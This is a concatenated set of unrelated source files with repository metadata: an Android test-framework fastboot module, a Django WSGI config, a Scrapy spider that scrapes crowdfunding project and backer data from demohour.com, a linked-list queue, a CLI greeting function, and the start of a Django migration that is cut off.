] | fromageball2@ps200061.dreamhostps.com |
7920769fb9df2c743760034190be86dff1f1947a | 65c0ef56c2e2c3e1646a610f49e6dd06f2c6102d | /src/libs/cmd/implement/emulator/fastboot.py | e8c8437bb490f5e1cb28f6289ccb8449e2873cad | [
"MIT"
] | permissive | VirtualVFix/AndroidTestFramework | d3411f328a793ee7b007c4736983204aae81b739 | 1feb769c6aca39a78e6daefd6face0a1e4d62cd4 | refs/heads/master | 2020-08-11T14:48:12.454415 | 2019-10-12T10:20:43 | 2019-10-12T10:20:43 | 214,582,560 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | # All rights reserved by forest fairy.
# You cannot modify or share anything without sacrifice.
# If you don't agree, keep calm and don't look at code bellow!
__author__ = "VirtualV <https://github.com/virtualvfix>"
__date__ = "09/22/17 14:27"
from .cmd import Cmd
from libs.cmd.implement.base.fastboot import Fastboot
from libs.cmd.implement.base.cmd import Cmd as CmdBase
#: Replace :class:`implement.base.cmd.Cmd` class by :class:`implement.emulator.cmd.Cmd`
#: After class replace Fastboot emulator class have same signature as Fastboot base
Fastboot.__bases__ = tuple([x if not issubclass(x, CmdBase) else Cmd for x in Fastboot.__bases__])
| [
"github.com/virtualvfix"
] | github.com/virtualvfix |
d38cc05d6855728cca643e5465316346c6fc15f0 | 964fbc4bf2950cbbe463a33dafcf0e54dedc4c81 | /Webeloperss/wsgi.py | 4321494600271535f62d9e4081dbd74ab9145361 | [] | no_license | fast-falcon/django_project2 | 057ff6904fbb8f28aae06c248db8a526cf725866 | 2bd99ec5891635edea5180a488b0d51c840ed752 | refs/heads/master | 2020-04-14T00:31:38.884572 | 2018-12-29T19:34:22 | 2018-12-29T19:34:22 | 163,535,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
WSGI config for Webeloperss project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Webeloperss.settings')
application = get_wsgi_application()
| [
"pouriaff7171@gmail.com"
] | pouriaff7171@gmail.com |
3eee4d4542d35cf399d9ec34d7297cd55f76de42 | 1eca4c0a9f738bb0ab6257256d3bbf05376344a9 | /DemoHour/spiders/DemoSpider.py | 39a2827ea004fd86d86b647e4ece0a57e3277689 | [] | no_license | gzou107/DemonHour | 257de668ce5a1bf9b05a11fc1dfd26abf3727682 | 636c68244b2c5c8c4aa3aac91565e00cfbc85ffe | refs/heads/master | 2016-09-05T17:51:33.531343 | 2013-07-11T06:50:05 | 2013-07-11T06:50:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,358 | py | from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from DemoHour.items import Proj_Item, Proj_Owner_Item, Proj_Supporter, Proj_Topic, Proj_Incentive_Options_Item, User_Item
from scrapy.http.request import Request
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.contrib.loader import XPathItemLoader
import re
import urlparse
from decimal import *
class DemoSpider(CrawlSpider):
name = 'DemoHourSpider'
domain = ['demohour.com']
start_urls = [
'http://www.demohour.com/projects/318807',
'http://www.demohour.com/projects/319076',
# 'http://www.demohour.com/projects/discover/5_0_0_6?page=1', 319076
"""
'http://www.demohour.com/projects/318262',
'http://www.demohour.com/projects/318807',
'http://www.demohour.com/projects/319076',
'http://www.demohour.com/projects/317898',
'http://www.demohour.com/projects/319276',
'http://www.demohour.com/projects/319178',
'http://www.demohour.com/projects/319106',
'http://www.demohour.com/projects/317125',
'http://www.demohour.com/projects/320867',
'http://www.demohour.com/projects/318508',
'http://www.demohour.com/projects/318747',
"""
# 'http://www.demohour.com/', 319076, 317898, 319276, 319178, 319106, 317125, 320867, 318508, 318747
# 'http://www.demohour.com/projects/discover/0_0_0_5'
]
# , 'http://www.demohour.com/projects/317769']
# SgmlLinkExtractor(allow=('demohour.com/projects/[0-9]+/backers'))
# 318262 320144
# http://www.demohour.com/projects/317272
# backers_extractor = SgmlLinkExtractor(allow=('/projects/318262/backers',), deny=('page=1$',))
# supporter_name = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/a[@class='supportersmeta-t-a']/text()").extract()
# deny=('page=1$',)
# proj_table_extractor = SgmlLinkExtractor(allow=('/projects/[\d]+$',),deny=('page=1$',) )
# backers_table_extractor = SgmlLinkExtractor(allow=('/projects/[\d]+/backers?',),deny=('page=1$',), )
# users_table_extractor = SgmlLinkExtractor(allow=('/[\d]+$',),deny=('page=1$',), )
#success_proj_extractor = SgmlLinkExtractor(allow=('/projects/318262$',),deny=('page=1$',) )
#backers_table_extractor = SgmlLinkExtractor(allow=('/projects/318262/backers?',),deny=('page=1$',), )
proj_table_extractor = SgmlLinkExtractor(allow=('/projects/319076',),deny=('page=1$',) )
backers_table_extractor = SgmlLinkExtractor(allow=('/projects/319076/backers?',),deny=('page=1$',), )
# users_table_extractor = SgmlLinkExtractor(allow=('/[\d7]+$',),deny=('page=1$',), )
# '/projects/309168$', '/projects/320084$', '/projects/319703$' deny=('page=1$',)
# proj_sidebar_funding = SgmlLinkExtractor(allow=('/projects/318262/posts$',), )
rules = (
# Extract link matching 'backers?page= and parse them with the spider's method, parse_one_supporters_page
# allow=('backers?page=')
# Rule(success_proj_extractor, callback='parse_success_proj_entry', follow = True), # This must comes before next one in order to extract all the backer information
Rule(backers_table_extractor, callback='parse_backers_links', follow = True), # This must comes before next one in order to extract all the backer information
# Rule(success_proj_extractor, callback='parse_success_proj_entry', follow = True), # This must comes before next one in order to extract all the backer information
Rule(proj_table_extractor, callback = 'parse_proj_info', follow = True),
# Rule(users_table_extractor, callback='parse_users', follow = True),
# Rule(proj_sidebar_funding, callback = 'parse_sidebar_funding',follow = False),
# Extract link matching
)
def parse_success_proj_entry(self, response):
hxs = HtmlXPathSelector(response)
success_projects = hxs.select("//div[@id='projects']/ul[@class='project-one']/li[@class='project-titile']/a/@href")
print "find success projects urls %s" %success_projects
for success_project in success_projects:
success_projects_full_url = self.add_url_prefix(success_project.extract())
print " we find one success project url, and its url = %s" %success_projects_full_url
yield Request(urlparse.urljoin("http://www.demohour.com/",success_project.extract()), callback = self.parse_proj_info)
for item in self.parse_proj_info(response):
yield item
"""
for supporter in self.parse_backers_links(response): # we have supporter information here
print "supporter name:", supporter['supporter_name']
print "supporter url:", supporter['supporter_url']
print "supporter icon:", supporter['supporter_icon']
print "supporter support time", supporter['supporter_support_time']
print "supporter support amount", supporter['supporter_support_amount']
print "supporter support total proj count", supporter['supporter_total_support_proj']
supporter['supporter_proj_id'] = PROJ_ID
yield supporter
"""
def add_url_prefix(self, url):
return "http://www.demohour.com" + url
def parse_proj_info(self, response):
hxs = HtmlXPathSelector(response)
##################################################################################################################
# section of proj table
# (proj_url, proj_id(PK), proj_name, proj_funding_target, proj_current_funding_amount, proj_current_funding_percentage, proj_status, proj_left_over_time, proj_owner_name,
# proj_owner_location, proj_supporter_count, proj_surfer_count, proj_topic_count)
###################################################################################################################
proj = Proj_Item()
# get proj url, add prefix to get the complete url
proj_url = hxs.select("//div[@class='ui-tab']/div[@class='ui-tab-top']/h1/a/@href").extract()
if len(proj_url) != 1:
self.log("Parse the proj url error. %s" %response.url)
return
else:
proj['proj_url'] = self.add_url_prefix(proj_url[0])
# one very important id -->Proj_Id
# if len(
PROJ_ID = proj_url[0].split('/')
if len(PROJ_ID) != 3:
self.log("Parse Proj_id error. %s" %response.url)
else:
PROJ_ID = PROJ_ID[len(PROJ_ID) - 1]
proj['proj_id'] = PROJ_ID
# get the proj name
proj_title = hxs.select("//div[@class='ui-tab']/div[@class='ui-tab-top']/h1/a/text()").extract()
if len(proj_title) != 1:
self.log("Parse the proj name error. %s" %response.url)
else:
proj['proj_name'] = proj_title[0]
projs_sidebar_funding = hxs.select("//div[@class='sidebar-funding']")
if len(projs_sidebar_funding) == 0:
projs_sidebar_funding = hxs.select("//div[@class='sidebar-warming']")
if len(projs_sidebar_funding) == 0:
projs_sidebar_funding = hxs.select("//div[@class='sidebar-success']")
if len(projs_sidebar_funding) == 0:
projs_sidebar_funding = hxs.select("//div[@class='sidebar-failure']")
if(len(projs_sidebar_funding) != 1):
self.log("Parse the proj table error. %s" %response.url)
print "Parse the proj table error. %s" %response.url
else:
# get proj_funding_target
p = projs_sidebar_funding[0]
proj_funding_target = p.select(".//div[@class='sidebar-money-raised-num-t']/b/text()").extract()
print proj_funding_target
if len(proj_funding_target) == 1:
proj['proj_funding_target'] = proj.clean_proj_funding_target(proj_funding_target[0])
# get proj_current_funding_amount
proj_current_funding_amount = p.select(".//div[@class='sidebar-money-raised-num']/b/text()").extract()
print proj_current_funding_amount
if len(proj_current_funding_amount) == 1:
proj['proj_current_funding_amount'] = proj.clean_proj_current_funding_amount(proj_current_funding_amount[0])
# get proj_current_funding_percentage
proj_current_funding_percentage = p.select(".//span[@class='sidebar-percentage-progress-span']/text()").extract()
print proj_current_funding_percentage
if len(proj_current_funding_percentage) != 1:
self.log("Parse the proj_current_funding_percentage at url = %s" %response.url)
else:
percentage = re.search('[\d]+', proj_current_funding_percentage[0])
if percentage == None:
self.log("Parse the proj_current_funding_percentage at url = %s" %response.url)
else:
percentage = percentage.group(0)
proj['proj_current_funding_percentage'] = Decimal(percentage.strip('"'))/100
# this is how many people support this proj
proj_supporter_count = p.select(".//div[@class='sidebar-number-days-l']/b/b/text()").extract()
print "support num:", proj_supporter_count
if len(proj_supporter_count) == 1:
proj['proj_supporter_count'] = proj_supporter_count[0]
# this is how many people view this proj
proj_surfer_count = p.select(".//div[@class='sidebar-number-days-m']/b/b/text()").extract()
print "people view ", proj_surfer_count
if len(proj_surfer_count) == 1:
proj['proj_surfer_count'] = proj_surfer_count[0]
# get topic of the proj
topic_count = hxs.select("//ul[@class='ui-tab-menu']/li/a/span[@id='posts_count']/text()").extract()
if len(topic_count) != 1:
self.log("Parse topic count error. %s" %response.url)
print "Parse topic count error. %s" %response.url
else:
proj['proj_topic_count'] = topic_count[0]
# get the proj_status
proj_status = p.select(".//div[@class='sidebar-number-days-r']/span/text()").extract()
if len(proj_status) != 1:
self.log("Parse proj status error. %s" %response.url)
print "Parse proj status error. %s" %response.url
else:
proj['proj_status'] = proj_status[0]
# get how many days left
proj_leftover_time = p.select(".//div[@class='sidebar-number-days-r']/b/b/text()").extract()
print "days left ", proj_leftover_time
if len(proj_leftover_time) == 1:
proj['proj_leftover_time'] = proj_leftover_time[0]
# get the unit of left_over
proj_leftover_time_units = p.select(".//div[@class='sidebar-number-days-r']/b/text()").extract()
if len(proj_leftover_time_units) == 1:
proj['proj_leftover_time_unit'] = 0 # proj complete
elif len(proj_leftover_time_units) == 2:
proj['proj_leftover_time_unit'] = proj_leftover_time_units[1]
else:
self.log("Can not parse proj left over time at url=%s" %response.url)
print "Parse proj left over time error. %s" %response.url
# get proj_owner information
projs_owner = hxs.select("//div[@class='project-by']")
if len(projs_owner) != 1:
self.log("Parse proj owner error. %s" %response.url)
else:
p = projs_owner[0]
proj_owner_owner_name = p.select(".//a[@class='project-by-img-r-author']/text()").extract()
if len(proj_owner_owner_name) == 1:
proj['proj_owner_name'] = proj_owner_owner_name[0]
# get proj_location --> this wil be extracted in another table
# reason is this information may not be available at back page, only exist in main page
yield proj
# end of section of proj table
##################################################################################################################
##################################################################################################################
# section of section of proj_owner_table
# (proj_owner_owner_id(PK), proj_owner_proj_id(PK), proj_owner_owner_name, proj_owner_star_level, proj_owner_last_log_in_time,
# proj_owner_own_proj_count, proj_owner_support_proj_count )
##################################################################################################################
projs_owner = hxs.select("//div[@class='project-by']")
if len(projs_owner) != 1:
self.log("Parse the proj_owner error. %s" %response.url)
print "Parse the proj_owner error. %s" %response.url
else:
p = projs_owner[0]
proj_owner = Proj_Owner_Item()
proj_owner_owner_id = p.select(".//a[@class='project-by-img-r-author']/@href").extract()
print "proj name url: ", proj_owner_owner_id
if len(proj_owner_owner_id) != 1:
self.log("Parse proj owner id from page %s error" %response.url)
else:
owner_id = re.search('[0-9]+$', proj_owner_owner_id[0])
if owner_id == None:
self.log("Extract the proj owner id from url = %s error" %response.url)
else:
proj_owner['proj_owner_owner_id'] = owner_id.group(0)
proj_owner['proj_owner_proj_id'] = PROJ_ID
proj_owner_owner_name = p.select(".//a[@class='project-by-img-r-author']/text()").extract()
print "proj name: ", proj_owner_owner_name
if len(proj_owner_owner_name) == 1:
proj_owner['proj_owner_owner_name'] = proj_owner_owner_name[0]
proj_owner_star_level = p.select(".//div[@class='project-by-img-r']/div[@class='icon-sun-m']/a/text()").extract()
print "proj proj_owner_star_level: ", proj_owner_star_level
if len(proj_owner_star_level) == 1:
proj_owner['proj_owner_star_level'] = proj_owner_star_level[0]
proj_owner_last_log_in_time = p.select(".//div[@class='project-by-last-time']/text()").extract()
print "proj last update time,", proj_owner_last_log_in_time
log_in = re.search('[\d]+/[\d]+/[\d]+', proj_owner_last_log_in_time[0])
if log_in == None:
self.log("parse proj owner proj_owner_last_log_in_time error at page %s" %response.url)
else:
proj_owner['proj_owner_last_log_in_time'] = log_in.group(0)
proj_by_post_support_list = p.select(".//div[@class='project-by-post']/a[@target='_blank']/span/text()").extract()
proj_owner_support_proj_count = 0
proj_owner_own_proj_count = 0
if len(proj_by_post_support_list) >= 1:
proj_owner_support_proj_count = proj_by_post_support_list[0]
proj_owner['proj_owner_support_proj_count'] = proj_by_post_support_list[0]
if len(proj_by_post_support_list) >= 2:
proj_owner_own_proj_count = proj_by_post_support_list[1]
proj_owner['proj_owner_own_proj_count'] = proj_by_post_support_list[1]
print "proj owner supports:", proj_owner_support_proj_count
print "proj owner owns:", proj_owner_own_proj_count
yield proj_owner
# end of section of proj_owner_table
##################################################################################################################
##################################################################################################################
# section of donation table, we need to follow the link within the donor page (pagination)
##########################################################################################
#u'/projects/318262/backers' #
# >>> response.url #
# 'http://www.demohour.com/projects/318262' #
##########################################################################################
backers = hxs.select("//div[@class='ui-tab-layout']/ul[@class='ui-tab-menu']/li/a/@href")
if len(backers) == 3: # we have current tab, posts and backers tab
backer_relative_urls = backers[2].extract().split('/')
backer_relative_url = backer_relative_urls[len(backer_relative_urls) - 1]
backers_full_url = response.url + '/' + backer_relative_url
yield Request(backers_full_url, self.parse_backers_links)
for supporter in self.parse_backers_links(response): # we have supporter information here
print "supporter name:", supporter['supporter_name']
print "supporter url:", supporter['supporter_url']
print "supporter icon:", supporter['supporter_icon']
print "supporter support time", supporter['supporter_support_time']
print "supporter support amount", supporter['supporter_support_amount']
print "supporter support total proj count", supporter['supporter_total_support_proj']
supporter['supporter_proj_id'] = PROJ_ID
yield supporter
# end of section of donation table
##################################################################################################################
# if we want to add the user information table, we will do sth similar to the back table here
###################################################################################################################################
# section of Topic table
# (topic_proj_id(PK), topic_total_buzz_count, topic_announcement_count, topic_question_count, topic_up_count, topic_down_count, topic_proj_category, topic_proj_location )
###################################################################################################################################
projs_topic = hxs.select("//div[@class='projects-home-left']")
if len(projs_topic) == 1:
#self.log("Parse the topic at the end of the page error at url = %s" %response.url)
#else:
proj_topic = Proj_Topic()
proj_topic['topic_proj_id'] = PROJ_ID
# get the topic_total_buzz_count
topic_total_buzz_count = projs_topic.select(".//li/a[@id='filter_all']/span/text()").extract()
if len(topic_total_buzz_count) != 1:
self.log("Parse topic_total_buzz_count error at url = %s" %response.url)
else:
proj_topic['topic_total_buzz_count'] = topic_total_buzz_count[0]
topic_all_count = projs_topic.select(".//li/a[@data-remote='true']/span/text()").extract()
if len(topic_all_count) < 5:
self.log("Parse other buzz count error at url = %s" %response.url)
else:
proj_topic['topic_announcement_count'] = topic_all_count[1]
proj_topic['topic_question_count'] = topic_all_count[2]
proj_topic['topic_up_count'] = topic_all_count[3]
proj_topic['topic_down_count'] = topic_all_count[4]
# now we will get the proj tags, e.g., category, location
projs_tag = hxs.select(".//div[@class='projects-home-left-seat']/a[@target='_blank']/text()").extract()
if len(projs_tag) != 3:
self.log("Parse proj tag error at url = %s" %response.url)
return
else:
proj_topic['topic_proj_category'] = projs_tag[0]
proj_topic['topic_proj_owner_name'] = projs_tag[1]
proj_topic['topic_proj_location'] = projs_tag[2]
yield proj_topic
# yield item
###################################################################################################################################
# section of incentive/reward table
# (incentive_proj_id(PK), incentive_id(PK), incentive_expect_support_amount, incentive_current_supporter_count, incentive_total_allowable_supporter_count,
# incentive_description, incentive_reward_shipping_method, incentive_reward_shipping_time)
###################################################################################################################################
projs_reward_options = hxs.select("//div[@class='reward-options']/ul")
rewards = []
firstIncentive = True
for p in projs_reward_options:
reward = Proj_Incentive_Options_Item()
reward['incentive_proj_id'] = PROJ_ID
# get incentive_expect_support_amount
incentive_expect_support_amount = p.select(".//li[@class='support-amount']/text()[2]").extract()
print "support amount: ", incentive_expect_support_amount
if len(incentive_expect_support_amount) == 1:
reward['incentive_expect_support_amount'] = reward.clean_expect_support_amount(incentive_expect_support_amount[0])
# if len(support_amount) == 1:
# reward['incentive_expect_support_amount'] = support_amount[0]
# get incentive_current_supporter_count
incentive_current_supporter_count = p.select(".//li[@class='support-amount']/span/text()").extract()
print "supporter number:", incentive_current_supporter_count
if len(incentive_current_supporter_count) == 1:
count= reward.clean_current_supporter_count(incentive_current_supporter_count[0])
if len(count) == 1:
reward['incentive_current_supporter_count'] = count[0]
# get incentive_total_allowable_supporter_count, if any
incentive_total_allowable_supporter_count = p.select(".//li[@class='supporter-number']/div[@class='supporter-limit']/p/text()").extract()
if len(incentive_total_allowable_supporter_count) == 1:
quote = reward.clean_total_allowable_supporter_count(incentive_total_allowable_supporter_count[0])
if len(quote) >= 1:
reward['incentive_total_allowable_supporter_count'] = quote[0]
# get incentive_description,
incentive_description = p.select(".//li[@class='returns-contents']/p/text()").extract()
if len(incentive_description) >= 1:
reward['incentive_description'] = reward.clean_incentive_descriptions(incentive_description[0])
# get incentive_reward_shipping_method, if any
incentive_reward_shipping_time_and_method = p.select(".//li[@class='returns-contents-time']/p/text()").extract()
if len(incentive_reward_shipping_time_and_method) == 1:
shipping_time = reward.clean_reward_shipping_time(incentive_reward_shipping_time_and_method[0])
if len(shipping_time) >= 1:
reward['incentive_reward_shipping_time'] = shipping_time[0]
elif len(incentive_reward_shipping_time_and_method) == 2:
shipping_method = incentive_reward_shipping_time_and_method[0]
reward['incentive_reward_shipping_method'] = shipping_method
time = reward.clean_reward_shipping_time(incentive_reward_shipping_time_and_method[1])
if len(time) >= 1:
reward['incentive_reward_shipping_time'] = time[0]
rewards.append(reward)
###################################################################################################################################
# end of table incentive/reward
###################################################################################################################################
for reward in rewards:
yield reward
def parse_backers_links(self, response):
hxs = HtmlXPathSelector(response)
current_page = hxs.select("//div[@class='ui-pagination-current']/ul/li/a/@href")
# current_page = hxs.select("//div[@class='ui-pagination-next']/ul/li/a/@href")
if not not current_page:
yield Request(current_page[0], self.parse_one_supporters_page)
for item in self.parse_one_supporters_page(response):
yield item
def parse_one_supporters_page(self, response):
hxs = HtmlXPathSelector(response)
# titles = hxs.select("//span[@class='pl']")
# avoid double parse here???
backer_url = re.search('[0-9]+', response.url)
PROJ_ID = -1
if backer_url != None:
# self.log('parse the proj_id in backer page error in %s' %response.url)
#else:
PROJ_ID = backer_url.group(0)
backers = hxs.select("//div[@class='projects-backers-left']/div[@class='supporters']")
items = []
for backer in backers:
item = Proj_Supporter()
supporter_name = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/a[@class='supportersmeta-t-a']/text()").extract()
supporter_id = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/a[@class='supportersmeta-t-a']/@href").extract()
supporter_icon = backer.select(".//div[@class='supportersmeta']/div[@class='supportersmeta-t']/div[@class='icon-sun-ms']/a/text()").extract()
supporter_total_support_proj= backer.select(".//div[@class='supportersmeta']/text()[4]").extract()
supporter_support_time = backer.select(".//div[@class='supportersmeta']/text()[2]").extract()
supporter_support_amount = backer.select(".//div[@class='supportersmeta']/text()[3]").extract()
#print "supporter name", supporter_name
#print "supporter url", supporter_url
#print "supporter icon level ", supporter_icon
#print "supporter_total_support_proj ", supporter_total_support_proj
#print "supporter_support_time ", supporter_support_time
#print "supporter total support", supporter_support_amount
if len(supporter_name) == 1:
item['supporter_name'] = supporter_name[0]
if len(supporter_id) == 1:
item['supporter_id'] = item.clean_supporter_id(supporter_id[0])
if len(supporter_icon) == 1:
item['supporter_icon'] = item.clean_supporter_icon(supporter_icon[0])
if len(supporter_support_time) == 1:
item['supporter_support_time']= item.clean_supporter_support_time(supporter_support_time[0])
if len(supporter_support_amount) == 1:
item['supporter_support_amount'] = supporter_support_amount[0]
if len(supporter_total_support_proj) == 1:
item['supporter_total_support_proj'] = item.clean_supporter_total_support_proj(supporter_total_support_proj[0])
item['supporter_proj_id'] = PROJ_ID
items.append(item)
for item in items:
yield item
# return items
"""
projs_time = hxs.select("//div[@class='project-by-last-time']")
item = DemonHourItem()
# section of proj homepage, determine if we have video or image
# if video, set flag =1, save the flash url
# if image, set flag = 0, save the image url
projs_project_intro_video = hxs.select("//div[@class='projects-home-synopsis']/div[@class='projects-home-left-top']/embed[@src]/text()").extract()
print "proj intro video:", projs_project_intro_video
# item['projs_project_intro_video'] = projs_project_intro_video
projs_project_intro_img = hxs.select("//div[@class='projects-home-synopsis']/div[@class='projects-home-left-top']/img[@src]/text()").extract()
print "proj intro img:", projs_project_intro_img
# item['projs_project_intro_img'] = projs_project_intro_img
# end of section proj home page
# section of div.sidebar-funding
projs_sidebar_funding = hxs.select("//div[@class='sidebar-funding']")
for p in projs_sidebar_funding:
projs_sidebar_money_raised_num_t = p.select(".//div[@class='sidebar-money-raised-num-t']").select(".//b/text()").extract()
print projs_sidebar_money_raised_num_t
# item['projs_sidebar_money_raised_num_t'] = projs_sidebar_money_raised_num_t
projs_sidebar_money_raised_num = p.select(".//div[@class='sidebar-money-raised-num']").select(".//b/text()").extract()
print projs_sidebar_money_raised_num
# item['projs_sidebar_money_raised_num'] = projs_sidebar_money_raised_num
projs_sidebar_percentage_progress_span = p.select(".//span[@class='sidebar-percentage-progress-span']/text()").extract()
print projs_sidebar_percentage_progress_span
# item['projs_sidebar_percentage_progress_span'] = projs_sidebar_percentage_progress_span
# this is how many people support this proj
projs_sidebar_number_days_1 = p.select(".//div[@class='sidebar-number-days-l']/b/b/text()").extract()
print "support num:", projs_sidebar_number_days_1
# item['projs_sidebar_number_days_1'] = projs_sidebar_number_days_1
# this is how many people view this proj
projs_sidebar_number_days_m = p.select(".//div[@class='sidebar-number-days-m']/b/b/text()").extract()
print "people view ", projs_sidebar_number_days_m
# item['projs_sidebar_number_days_m'] = projs_sidebar_number_days_m
# this is how many days left
projs_sidebar_number_days_r = p.select(".//div[@class='sidebar-number-days-r']/b/b/text()").extract()
print "days left ", projs_sidebar_number_days_r
# item['projs_sidebar_number_days_r'] = projs_sidebar_number_days_r
# end of section div.sidebar-funding
# section of proj-by where we have the proj owner information
projs_by = hxs.select("//div[@class='project-by']")
for p in projs_by:
projs_by_img_r_author = p.select(".//a[@class='project-by-img-r-author']/text()").extract()
print "proj name: ", projs_by_img_r_author
# item['projs_by_img_r_author'] = projs_by_img_r_author
projs_by_img_r_author_url = p.select(".//a[@class='project-by-img-r-author']/@href").extract()
print "proj name url: ", projs_by_img_r_author_url
# item['projs_by_img_r_author_url'] = projs_by_img_r_author_url
projs_by_last_time = p.select(".//div[@class='project-by-last-time']/text()").extract()
print "proj last update time,", projs_by_last_time
# item['projs_by_last_time'] = projs_by_last_time
proj_by_post_support = p.select(".//div[@class='project-by-post']/a[@target='_blank']/span/text()").extract()
print "proj owner owns:", proj_by_post_support
# item['proj_by_post_support'] = proj_by_post_support
# for p_sub in proj_by_post:
# proj_support_and_own = proj_by_post.select(".//span/text()/").extract()
# print "proj owner support or own:", proj_support_and_own
# end of section of proj-by where we have the proj owner information
# section div class="reward-options" save all the reward options, and the main information
# support amount and current supporter number projs_reward_supporter_count
projs_reward_options = hxs.select("//div[@class='reward-options']/ul")
reward = []
for p in projs_reward_options:
reward = RewardOption()
projs_reward_support_amount = p.select(".//li[@class='support-amount']/text()[2]").extract()
print "support amount: ", projs_reward_support_amount
reward['projs_reward_support_amount'] = projs_reward_support_amount
projs_reward_supporter_count = p.select(".//li[@class='support-amount']/span/text()").extract()
print "supporter number:", projs_reward_supporter_count
reward['projs_reward_supporter_count'] = projs_reward_supporter_count
projs_reward_supporter_limit = p.select(".//li[@class='supporter-number']/div[@class='supporter-limit']/p/text()").extract()
print "supporter number limit:", projs_reward_supporter_limit
reward['projs_reward_supporter_limit'] = projs_reward_supporter_limit
# item['projs_rewardOptions'].extend(reward)
# end of reward-option section
items = []
for i in range(1):
# we will do only once since for each projs we are expected to have one value for below items
# in xpath all elements start with index 1 rather than 0
#item = DemonHourItem()
for projs in projs:
item["owner"] = projs.select("a/text()").extract()
item["link"] = projs.select("a/@href").extract()
# print owner, link
for projs_time in projs_time:
item["last_update"] = projs_time.select("text()").extract()
# print last_update
items.append(item)
return items
"""
def parse_user(self, responser):
"""
Parse user page and populate the user information, and the refer page comes from one of the project, and it retures first the user information,
and also continue yield the project request.
"""
###################################################################################################################################
# section of user table
# (user_id, user_name, user_join_time, user_support_proj_count, user_own_proj_count, user_star_level)
# this models the regestered user, we do not track the detail proj information, but only the count information, as the support information is kept in the supporter table
# and ownership information is kept in the proj_owner_table
###################################################################################################################################
hxs = HtmlXPathSelector(response)
user = User_Item()
backer_url = re.search('[0-9]+', response.url)
PROJ_ID = -1
if backer_url != None:
user['user_id'] = backer_url.group(0)
# get the join time
user_profile = hxs.select("//div[@class='profile-bio']")
# handle the profile section
if len(user_profile) == 1:
p = user_profile[0]
user_name_tag = p.select(".//div[@class='profile-bio-r']/strong/text()").extract()
if len(user_name_tag) == 1:
user['user_name'] = user_name_tag[0]
user_star_level = p.select(".//div[@class='profile-bio-r']/div[@class='icon-sun-l']/a/text()").extract()
if len(user_star_level) == 1:
user['user_star_level'] = user_star_level[0]
user_join_time = p.select(".//p[@class='jiaru']/text()").extract()
if len(user_join_time) == 1:
user['user_join_time'] = user_join_time[0]
# now we will handle the supported prjects, caveat, we may have mutiple pages to handle
user_proj_count = hxs.select("//ul[@class='topmenutabs']")
if len(user_proj_count) == 1:
p = user_proj_count[0]
user_support_proj_count = p.select(".//li[@class='selected']/a/span/text()").extract()
if len(user_support_proj_count) == 1:
user['user_support_proj_count'] = user_support_proj_count[0]
user_own_proj_count = p.select(".//li/a[@class='select_projects']/span/text()").extarct()
if len(user_own_proj_count) == 2:
user['user_own_proj_count'] = user_own_proj_count[1]
yield user | [
"guixiz@microsoft.com"
] | guixiz@microsoft.com |
1926722da71183f936fd15d9c412fe2e5f789af4 | 35fb71dd7b67fcee5e01e090e5f2a04dbbf30a15 | /network_base/week01/day02/lqueue.py | a2b102948e76f64e135371e6dfc924f57c1832a7 | [] | no_license | zlz2013/zlz | 3119795848ed9cc43708482a2aa3e764c1312394 | 228d04a30b0782d859323e507ddd0c7459635bfb | refs/heads/master | 2020-06-05T17:44:47.975328 | 2019-09-10T11:57:23 | 2019-09-10T11:57:23 | 192,500,784 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | """
lqueue.py 链式队列
重点代码
思路分析:
1.基于链表模型完成链式栈
2.链表开端作为队头,尾端作为队尾
"""
class LQueueError(Exception):
pass
class Node:
def __init__(self,data,next=None):
self.data=data
self.next=next
#链式队列类
class LQueue:
def __init__(self):
#初始头尾指向一个没有实际意义的节点
self.front=self.rear=Node(None)
def is_empty(self):
return self.front==self.rear
#入队 尾动
def enqueue(self,elem):
self.rear.next=Node(elem)
self.rear=self.rear.next
#出队 头动
def dequeue(self):
if self.front==self.rear:
raise LQueueError("Queue is empty")
self.front=self.front.next
return self.front.data
if __name__=="__main__":
lq=LQueue()
lq.enqueue(10)
lq.enqueue(20)
lq.enqueue(30)
while not lq.is_empty():
print(lq.dequeue()) | [
"229165631@qq.com"
] | 229165631@qq.com |
362ffe4c25bda56646b8da422d6aabfb857c97ff | e86ffb722f7fd243ab2bc0b3e20763ab8f74b034 | /brain_games/cli.py | 4242fe41eaf49bb9ed1683159b47e3f7e745d99e | [] | no_license | ivan-shumilin/python-project-lvl1-v2 | 88ed921fac148df889974ce79623d9f7841cdd9b | 3e09daf9ba749fdfa448fd37f9b4c0956be35657 | refs/heads/main | 2023-08-04T05:11:39.716275 | 2021-09-21T15:21:02 | 2021-09-21T15:21:02 | 407,498,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | """Function welcom_user."""
import prompt
def welcome_user():
"""Print welcome."""
name = prompt.string('May I have your name? ')
print('Hello, {0}!'.format(name)) # Noqa:WPS421
| [
"shumilin.i.v@gmail.com"
] | shumilin.i.v@gmail.com |
2ac67697625c5683ebdb5b5288b6b5a298e1b8ee | 270ad55914ca6c1b75c2ef694db992d1f4443dfb | /restfultv_app/migrations/0001_initial.py | 85a67bb44c8d2d37b5a61acad456a5587734234f | [] | no_license | alitahir6001/semirest_tv | a53a974b82f7f0059a37f15724ab91224d13f839 | b908d18bbe766e8f11bbce4e5eaba693257452c9 | refs/heads/master | 2023-06-10T07:15:10.700424 | 2021-07-01T21:03:11 | 2021-07-01T21:03:11 | 322,084,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | # Generated by Django 2.2.4 on 2020-12-16 01:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=45)),
